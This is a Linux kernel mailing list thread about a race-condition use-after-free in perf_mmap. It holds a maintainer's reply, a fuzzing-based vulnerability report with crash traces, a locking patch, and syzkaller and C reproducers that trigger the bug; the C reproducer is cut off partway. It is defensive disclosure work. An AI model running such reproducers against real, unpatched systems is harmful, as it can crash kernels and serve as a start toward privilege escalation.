On Mon, Feb 02, 2026 at 03:44:35PM +0800, Haocheng Yu wrote: So you're saying this is something like: Thread-1 Thread-2 mmap(fd) close(fd) / ioctl(fd, IOC_SET_OUTPUT) I don't think close() is possible, because mmap() should have a reference on the struct file from fget(), no? That leaves the ioctl(), let me go have a peek.
{ "author": "Peter Zijlstra <peterz@infradead.org>", "date": "Mon, 2 Feb 2026 14:58:59 +0100", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello, I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed. Summary ------- A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5. Environment ----------- - Kernel version: 6.18.5 (the complete config is attached) - Architecture: x86_64 - Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1) Symptoms and logs ----------------- The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning The full report is as below: audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow: 1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer. 2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor. 3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer. 4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window. 5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report. Security impact --------------- The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible. Patch -------------- From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001 From: 0ne1r0s <yuhaocheng035@gmail.com> Date: Sat, 31 Jan 2026 21:16:52 +0800 Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0 Request ------- Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID. Best regards, Haocheng Yu Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug. audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) \ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 